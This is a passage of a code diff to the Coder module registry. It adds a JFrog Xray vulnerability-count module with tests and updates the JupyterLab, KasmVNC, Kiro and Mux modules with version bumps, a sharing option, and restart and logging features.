+This module fetches vulnerability scan results from JFrog Xray for container images stored in Artifactory. Use the outputs to display security information as workspace metadata.
+
+```tf
+module "jfrog_xray" {
+  source  = "registry.coder.com/coder/jfrog-xray/coder"
+  version = "1.0.0"
+
+  xray_url   = "https://example.jfrog.io/xray"
+  xray_token = var.artifactory_access_token
+  image      = "docker-local/myapp/backend:v1.0.0"
+}
+
+resource "coder_metadata" "xray_scan" {
+  count       = data.coder_workspace.me.start_count
+  resource_id = docker_container.workspace[0].id
+  icon        = "/icon/shield.svg"
+
+  item {
+    key   = "Image"
+    value = "docker-local/myapp/backend:v1.0.0"
+  }
+  item {
+    key   = "Total Vulnerabilities"
+    value = module.jfrog_xray.total
+  }
+  item {
+    key   = "Critical"
+    value = module.jfrog_xray.critical
+  }
+  item {
+    key   = "High"
+    value = module.jfrog_xray.high
+  }
+  item {
+    key   = "Medium"
+    value = module.jfrog_xray.medium
+  }
+  item {
+    key   = "Low"
+    value = module.jfrog_xray.low
+  }
+}
+```
+
+## Prerequisites
+
+1. Container images must be stored in JFrog Artifactory
+2. JFrog Xray must be configured to scan your repositories
+3. A valid JFrog access token with Xray read permissions
+
+## Remote Repositories
+
+When scanning images from remote (proxy) repositories, set `use_cache_repo = true`. This is because Artifactory stores cached images in a companion `-cache` repository where Xray indexes the scan results.
+
+```tf
+module "jfrog_xray" {
+  source  = "registry.coder.com/coder/jfrog-xray/coder"
+  version = "1.0.0"
+
+  xray_url       = "https://example.jfrog.io/xray"
+  xray_token     = var.artifactory_access_token
+  image          = "docker-remote/library/nginx:latest"
+  use_cache_repo = true
+}
+```

registry/coder/modules/jfrog-xray/main.test.ts

@@ -0,0 +1,244 @@
+import { serve } from "bun";
+import { describe, expect, it } from "bun:test";
+import { createJSONResponse, runTerraformInit, runTerraformApply } from "~test";
+
+describe("jfrog-xray", async () => {
+  await runTerraformInit(import.meta.dir);
+
+  // Mock server simulating a local repo with direct scan results
+  const mockLocalRepo = serve({
+    fetch: (req) => {
+      const url = new URL(req.url);
+      if (url.pathname === "/xray/api/v1/system/version")
+        return createJSONResponse({
+          xray_version: "3.80.0",
+          xray_revision: "abc123",
+        });
+      if (url.pathname === "/xray/api/v1/artifacts")
+        return createJSONResponse({
+          data: [
+            {
+              name: "myapp/backend/v1.0.0",
+              repo_path: "/myapp/backend/v1.0.0/manifest.json",
+              size: "50.00 MB",
+              sec_issues: {
+                critical: 1,
+                high: 3,
+                medium: 5,
+                low: 10,
+                total: 19,
+              },
+              scans_status: {
+                overall: {
+                  status: "DONE",
+                  time: "2026-03-04T22:00:02Z",
+                },
+              },
+              violations: 0,
+            },
+          ],
+          offset: 0,
+        });
+      return createJSONResponse({});
+    },
+    port: 0,
+  });
+
+  // Mock server simulating a remote repo with cache behavior
+  // Returns both tag manifest (0 vulns, 0 size) and SHA manifest (real vulns, real size)
+  const mockRemoteRepo = serve({
+    fetch: (req) => {
+      const url = new URL(req.url);
+      if (url.pathname === "/xray/api/v1/system/version")
+        return createJSONResponse({
+          xray_version: "3.80.0",
+          xray_revision: "abc123",
+        });
+      if (url.pathname === "/xray/api/v1/artifacts")
+        return createJSONResponse({
+          data: [
+            {
+              name: "codercom/enterprise-base/ubuntu",
+              repo_path: "/codercom/enterprise-base/ubuntu/list.manifest.json",
+              size: "0.00 B",
+              sec_issues: { total: 0 },
+              scans_status: {
+                overall: { status: "DONE" },
+              },
+              violations: 0,
+            },
+            {
+              name: "codercom/enterprise-base/sha256__abc123def456",
+              repo_path:
+                "/codercom/enterprise-base/sha256__abc123def456/manifest.json",
+              size: "359.33 MB",
+              sec_issues: {
+                critical: 2,
+                high: 6,
+                medium: 20,
+                low: 23,
+                total: 51,
+              },
+              scans_status: {
+                overall: { status: "DONE" },
+              },
+              violations: 2,
+            },
+          ],
+          offset: 0,
+        });
+      return createJSONResponse({});
+    },
+    port: 0,
+  });
+
+  // Mock server returning empty results (image not scanned)
+  const mockEmptyResults = serve({
+    fetch: (req) => {
+      const url = new URL(req.url);
+      if (url.pathname === "/xray/api/v1/system/version")
+        return createJSONResponse({
+          xray_version: "3.80.0",
+          xray_revision: "abc123",
+        });
+      if (url.pathname === "/xray/api/v1/artifacts")
+        return createJSONResponse({ data: [], offset: -1 });
+      return createJSONResponse({});
+    },
+    port: 0,
+  });
+
+  const localRepoUrl = `http://${mockLocalRepo.hostname}:${mockLocalRepo.port}`;
+  const remoteRepoUrl = `http://${mockRemoteRepo.hostname}:${mockRemoteRepo.port}`;
+  const emptyResultsUrl = `http://${mockEmptyResults.hostname}:${mockEmptyResults.port}`;
+
+  const getProviderEnv = (url: string) => ({
+    XRAY_URL: url,
+    XRAY_ACCESS_TOKEN: "test-token",
+  });
+
+  it("validates required variable: xray_url", async () => {
+    try {
+      await runTerraformApply(
+        import.meta.dir,
+        {
+          xray_token: "test-token",
+          image: "docker-local/test/image:latest",
+        },
+        getProviderEnv(localRepoUrl),
+      );
+      throw new Error("Expected apply to fail without xray_url");
+    } catch (ex) {
+      if (!(ex instanceof Error)) throw new Error("Unknown error");
+      expect(ex.message).toContain('input variable "xray_url" is not set');
+    }
+  });
+
+  it("validates required variable: xray_token", async () => {
+    try {
+      await runTerraformApply(
+        import.meta.dir,
+        {
+          xray_url: localRepoUrl,
+          image: "docker-local/test/image:latest",
+        },
+        getProviderEnv(localRepoUrl),
+      );
+      throw new Error("Expected apply to fail without xray_token");
+    } catch (ex) {
+      if (!(ex instanceof Error)) throw new Error("Unknown error");
+      expect(ex.message).toContain('input variable "xray_token" is not set');
+    }
+  });
+
+  it("validates required variable: image", async () => {
+    try {
+      await runTerraformApply(
+        import.meta.dir,
+        {
+          xray_url: localRepoUrl,
+          xray_token: "test-token",
+        },
+        getProviderEnv(localRepoUrl),
+      );
+      throw new Error("Expected apply to fail without image");
+    } catch (ex) {
+      if (!(ex instanceof Error)) throw new Error("Unknown error");
+      expect(ex.message).toContain('input variable "image" is not set');
+    }
+  });
+
+  it("returns vulnerability counts for local repository", async () => {
+    const state = await runTerraformApply(
+      import.meta.dir,
+      {
+        xray_url: localRepoUrl,
+        xray_token: "test-token",
+        image: "docker-local/myapp/backend:v1.0.0",
+      },
+      getProviderEnv(localRepoUrl),
+    );
+
+    expect(state.outputs.critical.value).toBe(1);
+    expect(state.outputs.high.value).toBe(3);
+    expect(state.outputs.medium.value).toBe(5);
+    expect(state.outputs.low.value).toBe(10);
+    expect(state.outputs.total.value).toBe(19);
+  });
+
+  it("returns zero counts when image has no scan results", async () => {
+    const state = await runTerraformApply(
+      import.meta.dir,
+      {
+        xray_url: emptyResultsUrl,
+        xray_token: "test-token",
+        image: "docker-local/unscanned/image:latest",
+      },
+      getProviderEnv(emptyResultsUrl),
+    );
+
+    expect(state.outputs.critical.value).toBe(0);
+    expect(state.outputs.high.value).toBe(0);
+    expect(state.outputs.medium.value).toBe(0);
+    expect(state.outputs.low.value).toBe(0);
+    expect(state.outputs.total.value).toBe(0);
+  });
+
+  it("uses cache repo when use_cache_repo is enabled", async () => {
+    const state = await runTerraformApply(
+      import.meta.dir,
+      {
+        xray_url: remoteRepoUrl,
+        xray_token: "test-token",
+        image: "docker-remote/codercom/enterprise-base:ubuntu",
+        use_cache_repo: true,
+      },
+      getProviderEnv(remoteRepoUrl),
+    );
+
+    // Should find the SHA artifact with actual vulnerabilities
+    expect(state.outputs.critical.value).toBe(2);
+    expect(state.outputs.high.value).toBe(6);
+    expect(state.outputs.medium.value).toBe(20);
+    expect(state.outputs.low.value).toBe(23);
+    expect(state.outputs.total.value).toBe(51);
+    expect(state.outputs.violations.value).toBe(2);
+    expect(state.outputs.artifact_name.value).toContain("sha256__");
+  });
+
+  it("allows custom repo and repo_path override", async () => {
+    const state = await runTerraformApply(
+      import.meta.dir,
+      {
+        xray_url: localRepoUrl,
+        xray_token: "test-token",
+        image: "ignored/path:tag",
+        repo: "docker-local",
+        repo_path: "/myapp/backend/v1.0.0",
+      },
+      getProviderEnv(localRepoUrl),
+    );
+
+    expect(state.outputs.total.value).toBe(19);
+  });
+});

registry/coder/modules/jfrog-xray/main.tf

@@ -0,0 +1,135 @@
+terraform {
+  required_version = ">= 1.0"
+
+  required_providers {
+    xray = {
+      source  = "jfrog/xray"
+      version = ">= 2.0"
+    }
+  }
+}
+
+provider "xray" {
+  url          = var.xray_url
+  access_token = var.xray_token
+}
+
+variable "xray_url" {
+  description = "The URL of your JFrog Xray instance (e.g., https://mycompany.jfrog.io/xray). This should point to the Xray API endpoint, not Artifactory."
+  type        = string
+  validation {
+    condition     = can(regex("^https?://", var.xray_url))
+    error_message = "The xray_url must be a valid URL starting with http:// or https://."
+  }
+}
+
+variable "xray_token" {
+  description = "The access token for authenticating with JFrog Xray. This token needs read permissions on Xray scan results. You can generate one in JFrog Platform under User Management > Access Tokens."
+  type        = string
+  sensitive   = true
+}
+
+variable "image" {
+  description = "The Docker image to check for vulnerabilities, in the format 'repo/path/image:tag'. For example: 'docker-local/myapp/backend:v1.0.0' or 'docker-remote/library/nginx:latest'. The repository name is extracted from the first path segment."
+  type        = string
+  validation {
+    condition     = length(split("/", var.image)) >= 2
+    error_message = "The image must include at least a repository and image name (e.g., 'docker-local/myimage:tag')."
+  }
+}
+
+variable "repo" {
+  description = "Override the repository name extracted from the image path. Use this when your Artifactory repository name differs from the first segment of your image path."
+  type        = string
+  default     = ""
+}
+
+variable "repo_path" {
+  description = "Override the full Xray repository path. Use this for custom path structures that don't follow the standard 'repo/image:tag' format. When set, this takes precedence over automatic path construction."
+  type        = string
+  default     = ""
+}
+
+variable "use_cache_repo" {
+  description = "Set to true when scanning images from remote (proxy) repositories. Remote repositories in Artifactory store cached artifacts in a companion '-cache' repository (e.g., 'docker-remote-cache'), which is where Xray indexes the scan results."
+  type        = bool
+  default     = false
+}
+
+locals {
+  # Parse the image string into components
+  # Example: "docker-local/myapp/backend:v1.0.0"
+  #   -> repo: "docker-local", image_name: "myapp/backend", tag: "v1.0.0"
+  image_parts = split("/", var.image)
+  base_repo   = var.repo != "" ? var.repo : local.image_parts[0]
+  parsed_repo = var.use_cache_repo ? "${local.base_repo}-cache" : local.base_repo
+  image_path  = join("/", slice(local.image_parts, 1, length(local.image_parts)))
+  image_name  = split(":", local.image_path)[0]
+  image_tag   = length(split(":", local.image_path)) > 1 ? split(":", local.image_path)[1] : "latest"
+
+  # Construct the Xray query path based on repository type:
+  # - Local repositories: Query the exact tag path (e.g., /myapp/backend/v1.0.0)
+  # - Remote repositories: Query by image name only (e.g., /myapp/backend) because
+  #   the Terraform provider only returns the SHA manifest (with actual scan data)
+  #   when querying the broader path
+  parsed_path = var.repo_path != "" ? var.repo_path : (
+    var.use_cache_repo ? "/${local.image_name}" : "/${local.image_name}/${local.image_tag}"
+  )
+
+  results = coalesce(try(data.xray_artifacts_scan.image_scan.results, []), [])
+
+  # For remote repositories, filter to find the actual scanned image (not tag pointers):
+  # - Tag manifests have size "0.00 B" (they're just pointers to SHA manifests)
+  # - SHA manifests have actual size (e.g., "359.33 MB") and contain the real scan data
+  # For local repositories, there's typically only one result which is the actual image
+  scanned_images = var.use_cache_repo ? [
+    for r in local.results : r if r.size != "0.00 B"
+  ] : local.results
+
+  # The artifact we'll report scan results for
+  scan_result = (
+    length(local.scanned_images) > 0 ? local.scanned_images[0] :
+    length(local.results) > 0 ? local.results[0] :
+    null
+  )
+}
+
+data "xray_artifacts_scan" "image_scan" {
+  repo      = local.parsed_repo
+  repo_path = local.parsed_path
+}
+
+output "critical" {
+  description = "The number of critical severity vulnerabilities found in the image. Critical vulnerabilities typically require immediate attention."
+  value       = try(local.scan_result.sec_issues.critical, 0)
+}
+
+output "high" {
+  description = "The number of high severity vulnerabilities found in the image."
+  value       = try(local.scan_result.sec_issues.high, 0)
+}
+
+output "medium" {
+  description = "The number of medium severity vulnerabilities found in the image."
+  value       = try(local.scan_result.sec_issues.medium, 0)
+}
+
+output "low" {
+  description = "The number of low severity vulnerabilities found in the image."
+  value       = try(local.scan_result.sec_issues.low, 0)
+}
+
+output "total" {
+  description = "The total number of vulnerabilities found across all severity levels."
+  value       = try(local.scan_result.sec_issues.total, 0)
+}
+
+output "artifact_name" {
+  description = "The name of the artifact that was scanned, as reported by Xray. For remote repositories, this will be the SHA-based manifest name (e.g., 'myimage/sha256__abc123...')."
+  value       = try(local.scan_result.name, "")
+}
+
+output "violations" {
+  description = "The number of Xray policy violations detected. Violations are triggered when vulnerabilities match rules defined in your Xray security policies."
+  value       = try(local.scan_result.violations, 0)
+}

registry/coder/modules/jupyterlab/README.md

@@ -16,7 +16,7 @@ A module that adds JupyterLab in your Coder template.
 module "jupyterlab" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/jupyterlab/coder"
-  version  = "1.2.1"
+  version  = "1.2.2"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ JupyterLab is automatically configured to work with Coder's iframe embedding. Fo
 module "jupyterlab" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/jupyterlab/coder"
-  version  = "1.2.1"
+  version  = "1.2.2"
   agent_id = coder_agent.main.id
   config = {
     ServerApp = {

registry/coder/modules/jupyterlab/main.test.ts

@@ -77,7 +77,7 @@ describe("jupyterlab", async () => {
     expect(output.exitCode).toBe(1);
     expect(output.stdout).toEqual([
       "Checking for a supported installer",
-      "No valid installer is not installed",
+      "No supported installer found.",
       "Please install pipx or uv in your Dockerfile/VM image before running this script",
     ]);
   });

registry/coder/modules/jupyterlab/run.sh

@@ -14,7 +14,7 @@ check_available_installer() {
     INSTALLER="uv"
     return
   fi
-  echo "No valid installer is not installed"
+  echo "No supported installer found."
   echo "Please install pipx or uv in your Dockerfile/VM image before running this script"
   exit 1
 }

registry/coder/modules/kasmvnc/README.md

@@ -14,7 +14,7 @@ Automatically install [KasmVNC](https://kasmweb.com/kasmvnc) in a workspace, and
 module "kasmvnc" {
   count               = data.coder_workspace.me.start_count
   source              = "registry.coder.com/coder/kasmvnc/coder"
-  version             = "1.2.7"
+  version             = "1.3.0"
   agent_id            = coder_agent.example.id
   desktop_environment = "xfce"
   subdomain           = true

registry/coder/modules/kasmvnc/main.tf

@@ -54,6 +54,15 @@ variable "subdomain" {
   description = "Is subdomain sharing enabled in your cluster?"
 }
 
+variable "share" {
+  type    = string
+  default = "owner"
+  validation {
+    condition     = var.share == "owner" || var.share == "authenticated" || var.share == "public"
+    error_message = "Incorrect value. Please set either 'owner', 'authenticated', or 'public'."
+  }
+}
+
 resource "coder_script" "kasm_vnc" {
   agent_id     = var.agent_id
   display_name = "KasmVNC"
@@ -75,7 +84,7 @@ resource "coder_app" "kasm_vnc" {
   url          = "http://localhost:${var.port}"
   icon         = "/icon/kasmvnc.svg"
   subdomain    = var.subdomain
-  share        = "owner"
+  share        = var.share
   order        = var.order
   group        = var.group
 

registry/coder/modules/kiro/README.md

@@ -18,7 +18,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "kiro" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.0"
+  version  = "1.2.1"
   agent_id = coder_agent.main.id
 }
 ```
@@ -31,7 +31,7 @@ module "kiro" {
 module "kiro" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.0"
+  version  = "1.2.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }
@@ -47,7 +47,7 @@ The following example configures Kiro to use the GitHub MCP server with authenti
 module "kiro" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/kiro/coder"
-  version  = "1.2.0"
+  version  = "1.2.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/kiro/main.tf

@@ -53,7 +53,7 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.0"
+  version = "1.0.2"
 
   agent_id = var.agent_id
 

registry/coder/modules/mux/README.md

@@ -1,31 +1,31 @@
 ---
-display_name: mux
+display_name: Mux
 description: Coding Agent Multiplexer - Run multiple AI agents in parallel
 icon: ../../../../.icons/mux.svg
 verified: true
 tags: [ai, agents, development, multiplexer]
 ---
 
-# mux
+# Mux
 
-Automatically install and run [mux](https://github.com/coder/mux) in a Coder workspace. By default, the module installs `mux@next` from npm (with a fallback to downloading the npm tarball if npm is unavailable). mux is a desktop application for parallel agentic development that enables developers to run multiple AI agents simultaneously across isolated workspaces.
+Automatically install and run [Mux](https://github.com/coder/mux) in a Coder workspace. By default, the module auto-detects an available package manager (`npm`, `pnpm`, or `bun`) to install `mux@next` (with a fallback to downloading the npm tarball if none is found). You can also force a specific package manager via `package_manager` and point to a custom registry with `registry_url`. The launcher keeps watching the mux process after startup, appends signal/exit-code diagnostics to the mux log when the server is killed outside the Node runtime, and can optionally wait a few seconds, remove the stale server lock, and restart Mux after any exit until an optional restart-attempt cap is reached. Mux is a desktop application for parallel agentic development that enables developers to run multiple AI agents simultaneously across isolated workspaces.
 
 ```tf
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.0.7"
+  version  = "1.4.3"
   agent_id = coder_agent.main.id
 }
 ```
 
-![mux](../../.images/mux-product-hero.webp)
+![Mux](../../.images/mux-product-hero.webp)
 
 ## Features
 
 - **Parallel Agent Execution**: Run multiple AI agents simultaneously on different tasks
 - **Mux Workspace Isolation**: Each agent works in its own isolated environment
-- **Git Divergence Visualization**: Track changes across different mux agent workspaces
+- **Git Divergence Visualization**: Track changes across different Mux agent workspaces
 - **Long-Running Processes**: Resume AI work after interruptions
 - **Cost Tracking**: Monitor API usage across agents
 
@@ -37,7 +37,7 @@ module "mux" {
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.0.7"
+  version  = "1.4.3"
   agent_id = coder_agent.main.id
 }
 ```
@@ -48,34 +48,107 @@ module "mux" {
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.0.7"
+  version  = "1.4.3"
   agent_id = coder_agent.main.id
   # Default is "latest"; set to a specific version to pin
   install_version = "0.4.0"
 }
 ```
 
+### Open a Project on Launch
+
+Start Mux with `mux server --add-project /path/to/project`:
+
+```tf
+module "mux" {
+  count       = data.coder_workspace.me.start_count
+  source      = "registry.coder.com/coder/mux/coder"
+  version     = "1.4.3"
+  agent_id    = coder_agent.main.id
+  add_project = "/path/to/project"
+}
+```
+
+### Pass Arbitrary `mux server` Arguments
+
+Use `additional_arguments` to append additional arguments to `mux server`.
+The module parses quoted values, so grouped arguments remain intact.
+
+```tf
+module "mux" {
+  count                = data.coder_workspace.me.start_count
+  source               = "registry.coder.com/coder/mux/coder"
+  version              = "1.4.3"
+  agent_id             = coder_agent.main.id
+  additional_arguments = "--open-mode pinned --add-project '/workspaces/my repo'"
+}
+```
+
+### Restart After Mux Exits
+
+Enable automatic restarts after Mux exits, including clean exits and intentional shutdown signals such as `SIGTERM`. The launcher waits for `restart_delay_seconds`, removes `~/.mux/server.lock`, and starts Mux again. Set `max_restart_attempts` to a whole number to stop retrying after a fixed number of restarts, or leave it at `0` for unlimited retries.
+
+```tf
+module "mux" {
+  count                 = data.coder_workspace.me.start_count
+  source                = "registry.coder.com/coder/mux/coder"
+  version               = "1.4.3"
+  agent_id              = coder_agent.main.id
+  restart_on_kill       = true
+  restart_delay_seconds = 3
+  max_restart_attempts  = 5
+}
+```
+
 ### Custom Port
 
 ```tf
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.0.7"
+  version  = "1.4.3"
   agent_id = coder_agent.main.id
   port     = 8080
 }
 ```
 
+### Custom Package Manager
+
+Force a specific package manager instead of auto-detection:
+
+```tf
+module "mux" {
+  count           = data.coder_workspace.me.start_count
+  source          = "registry.coder.com/coder/mux/coder"
+  version         = "1.4.3"
+  agent_id        = coder_agent.main.id
+  package_manager = "pnpm" # or "npm", "bun"
+}
+```
+
+### Custom Registry
+
+Use a private or mirrored npm registry:
+
+```tf
+module "mux" {
+  count        = data.coder_workspace.me.start_count
+  source       = "registry.coder.com/coder/mux/coder"
+  version      = "1.4.3"
+  agent_id     = coder_agent.main.id
+  registry_url = "https://npm.pkg.github.com"
+}
+```
+
 ### Use Cached Installation
 
-Run an existing copy of mux if found, otherwise install from npm:
+Run an existing copy of Mux if found, otherwise install from npm:
 
 ```tf
 module "mux" {
   count      = data.coder_workspace.me.start_count
   source     = "registry.coder.com/coder/mux/coder"
-  version    = "1.0.7"
+  version    = "1.4.3"
   agent_id   = coder_agent.main.id
   use_cached = true
 }
@@ -83,13 +156,13 @@ module "mux" {
 
 ### Skip Install
 
-Run without installing from the network (requires mux to be pre-installed):
+Run without installing from the network (requires Mux to be pre-installed):
 
 ```tf
 module "mux" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/mux/coder"
-  version  = "1.0.7"
+  version  = "1.4.3"
   agent_id = coder_agent.main.id
   install  = false
 }
@@ -101,6 +174,11 @@ module "mux" {
 
 ## Notes
 
-- mux is currently in preview and you may encounter bugs
+- Mux is currently in preview and you may encounter bugs
 - Requires internet connectivity for agent operations (unless `install` is set to false)
-- Installs `mux@next` from npm by default (falls back to the npm tarball if npm is unavailable)
+- Auto-detects `npm`, `pnpm`, or `bun` by default; set `package_manager` to force a specific one
+- Installs `mux@next` from the npm registry by default; set `registry_url` to use a private or mirrored registry
+- Falls back to a direct tarball download when no package manager is found
+- Appends best-effort signal and external-kill diagnostics to `log_path` if the mux process dies after startup
+- Set `restart_on_kill = true` to wait `restart_delay_seconds`, remove `~/.mux/server.lock`, and restart Mux after it exits
+- Set `max_restart_attempts` to a whole-number cap on restart attempts, or leave it at `0` for unlimited retries

registry/coder/modules/mux/main.test.ts

@@ -1,6 +1,11 @@
 import { describe, expect, it } from "bun:test";
 import {
   executeScriptInContainer,
+  execContainer,
+  findResourceInstance,
+  readFileContainer,
+  removeContainer,
+  runContainer,
   runTerraformApply,
   runTerraformInit,
   testRequiredVariables,
@@ -30,7 +35,7 @@ describe("mux", async () => {
     }
     expect(output.exitCode).toBe(0);
     const expectedLines = [
-      "📥 npm not found; downloading tarball from npm registry...",
+      "📥 No package manager found; downloading tarball from registry...",
       "🥳 mux has been installed in /tmp/mux",
       "🚀 Starting mux server on port 4000...",
       "Check logs at /tmp/mux.log!",
@@ -40,6 +45,243 @@ describe("mux", async () => {
     }
   }, 60000);
 
+  it("parses custom additional_arguments", async () => {
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+      install: false,
+      log_path: "/tmp/mux.log",
+      additional_arguments:
+        "--open-mode pinned --add-project '/workspaces/my repo'",
+    });
+
+    const instance = findResourceInstance(state, "coder_script");
+    const id = await runContainer("alpine/curl");
+
+    try {
+      const setup = await execContainer(id, [
+        "sh",
+        "-c",
+        `apk add --no-cache bash >/dev/null
+mkdir -p /tmp/mux
+cat <<'EOF' > /tmp/mux/mux
+#!/usr/bin/env sh
+i=1
+for arg in "$@"; do
+  echo "arg$i=$arg"
+  i=$((i + 1))
+done
+EOF
+chmod +x /tmp/mux/mux`,
+      ]);
+      expect(setup.exitCode).toBe(0);
+
+      const output = await execContainer(id, ["sh", "-c", instance.script]);
+      if (output.exitCode !== 0) {
+        console.log("STDOUT:\n" + output.stdout);
+        console.log("STDERR:\n" + output.stderr);
+      }
+      expect(output.exitCode).toBe(0);
+
+      await execContainer(id, ["sh", "-c", "sleep 1"]);
+      const log = await readFileContainer(id, "/tmp/mux.log");
+      expect(log).toContain("arg1=server");
+      expect(log).toContain("arg2=--port");
+      expect(log).toContain("arg3=4000");
+      expect(log).toContain("arg4=--open-mode");
+      expect(log).toContain("arg5=pinned");
+      expect(log).toContain("arg6=--add-project");
+      expect(log).toContain("arg7=/workspaces/my repo");
+    } finally {
+      await removeContainer(id);
+    }
+  }, 60000);
+
+  it("logs signal-based exits after startup", async () => {
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+      install: false,
+      log_path: "/tmp/mux.log",
+    });
+
+    const instance = findResourceInstance(state, "coder_script");
+    const id = await runContainer("alpine/curl");
+
+    try {
+      const setup = await execContainer(id, [
+        "sh",
+        "-c",
+        `apk add --no-cache bash >/dev/null
+mkdir -p /tmp/mux
+cat <<'EOF' > /tmp/mux/mux
+#!/usr/bin/env sh
+target_pid="$$"
+(
+  sleep 1
+  kill -9 "$target_pid"
+) &
+while true; do
+  sleep 1
+done
+EOF
+chmod +x /tmp/mux/mux`,
+      ]);
+      expect(setup.exitCode).toBe(0);
+
+      const output = await execContainer(id, ["sh", "-c", instance.script]);
+      if (output.exitCode !== 0) {
+        console.log("STDOUT:\n" + output.stdout);
+        console.log("STDERR:\n" + output.stderr);
+      }
+      expect(output.exitCode).toBe(0);
+
+      await execContainer(id, ["sh", "-c", "sleep 2"]);
+      const log = await readFileContainer(id, "/tmp/mux.log");
+      expect(log).toContain("shell exit code 137");
+      expect(log).toContain(
+        "SIGKILL usually means the process was killed externally or by the OOM killer.",
+      );
+    } finally {
+      await removeContainer(id);
+    }
+  }, 60000);
+
+  it("restarts after a clean exit when enabled", async () => {
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+      install: false,
+      log_path: "/tmp/mux.log",
+      restart_on_kill: true,
+      restart_delay_seconds: 1,
+      max_restart_attempts: 1,
+    });
+
+    const instance = findResourceInstance(state, "coder_script");
+    const id = await runContainer("alpine/curl");
+
+    try {
+      const setup = await execContainer(id, [
+        "sh",
+        "-c",
+        `apk add --no-cache bash >/dev/null
+mkdir -p /tmp/mux
+cat <<'EOF' > /tmp/mux/mux
+#!/usr/bin/env sh
+run_count_file="/tmp/mux-run-count"
+run_count=0
+if [ -f "$run_count_file" ]; then
+  run_count=$(cat "$run_count_file")
+fi
+run_count=$((run_count + 1))
+printf '%s' "$run_count" > "$run_count_file"
+echo "run=$run_count"
+if [ "$run_count" -eq 1 ]; then
+  mkdir -p "$HOME/.mux"
+  touch "$HOME/.mux/server.lock"
+  exit 0
+fi
+if [ -f "$HOME/.mux/server.lock" ]; then
+  echo "lock=present"
+else
+  echo "lock=cleaned"
+fi
+exit 0
+EOF
+chmod +x /tmp/mux/mux`,
+      ]);
+      expect(setup.exitCode).toBe(0);
+
+      const output = await execContainer(id, ["sh", "-c", instance.script]);
+      if (output.exitCode !== 0) {
+        console.log("STDOUT:\n" + output.stdout);
+        console.log("STDERR:\n" + output.stderr);
+      }
+      expect(output.exitCode).toBe(0);
+
+      await execContainer(id, ["sh", "-c", "sleep 4"]);
+      const log = await readFileContainer(id, "/tmp/mux.log");
+      const runCount = await readFileContainer(id, "/tmp/mux-run-count");
+      expect(log).toContain("run=1");
+      expect(log).toContain("mux server exited cleanly.");
+      expect(log).toContain(
+        "Waiting 1 seconds before restarting mux after it exited.",
+      );
+      expect(log).toContain(
+        "Removing /root/.mux/server.lock before restarting mux.",
+      );
+      expect(log).toContain("run=2");
+      expect(log).toContain("lock=cleaned");
+      expect(log).toContain(
+        "Reached the max restart attempts limit (1); not restarting mux again.",
+      );
+      expect(runCount.trim()).toBe("2");
+    } finally {
+      await removeContainer(id);
+    }
+  }, 60000);
+
+  it("restarts after SIGTERM when enabled", async () => {
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+      install: false,
+      log_path: "/tmp/mux.log",
+      restart_on_kill: true,
+      restart_delay_seconds: 1,
+      max_restart_attempts: 1,
+    });
+
+    const instance = findResourceInstance(state, "coder_script");
+    const id = await runContainer("alpine/curl");
+
+    try {
+      const setup = await execContainer(id, [
+        "sh",
+        "-c",
+        `apk add --no-cache bash >/dev/null
+mkdir -p /tmp/mux
+cat <<'EOF' > /tmp/mux/mux
+#!/usr/bin/env sh
+run_count_file="/tmp/mux-run-count"
+run_count=0
+if [ -f "$run_count_file" ]; then
+  run_count=$(cat "$run_count_file")
+fi
+run_count=$((run_count + 1))
+printf '%s' "$run_count" > "$run_count_file"
+echo "run=$run_count"
+if [ "$run_count" -eq 1 ]; then
+  kill -TERM $$
+fi
+exit 0
+EOF
+chmod +x /tmp/mux/mux`,
+      ]);
+      expect(setup.exitCode).toBe(0);
+
+      const output = await execContainer(id, ["sh", "-c", instance.script]);
+      if (output.exitCode !== 0) {
+        console.log("STDOUT:\n" + output.stdout);
+        console.log("STDERR:\n" + output.stderr);
+      }
+      expect(output.exitCode).toBe(0);
+
+      await execContainer(id, ["sh", "-c", "sleep 4"]);
+      const log = await readFileContainer(id, "/tmp/mux.log");
+      const runCount = await readFileContainer(id, "/tmp/mux-run-count");
+      expect(log).toContain("run=1");
+      expect(log).toContain("signal TERM (15); shell exit code 143.");
+      expect(log).toContain(
+        "Waiting 1 seconds before restarting mux after it exited.",
+      );
+      expect(log).toContain("run=2");
+      expect(log).toContain(
+        "Reached the max restart attempts limit (1); not restarting mux again.",
+      );
+      expect(runCount.trim()).toBe("2");
+    } finally {
+      await removeContainer(id);
+    }
+  }, 60000);
+
   it("runs with npm present", async () => {
     const state = await runTerraformApply(import.meta.dir, {
       agent_id: "foo",
@@ -55,7 +297,7 @@ describe("mux", async () => {
     expect(output.exitCode).toBe(0);
     const expectedLines = [
       "📦 Installing mux via npm into /tmp/mux...",
-      "⏭️  Skipping npm lifecycle scripts with --ignore-scripts",
+      "⏭️  Skipping lifecycle scripts with --ignore-scripts",
       "🥳 mux has been installed in /tmp/mux",
       "🚀 Starting mux server on port 4000...",
       "Check logs at /tmp/mux.log!",

registry/coder/modules/mux/main.tf

@@ -7,6 +7,10 @@ terraform {
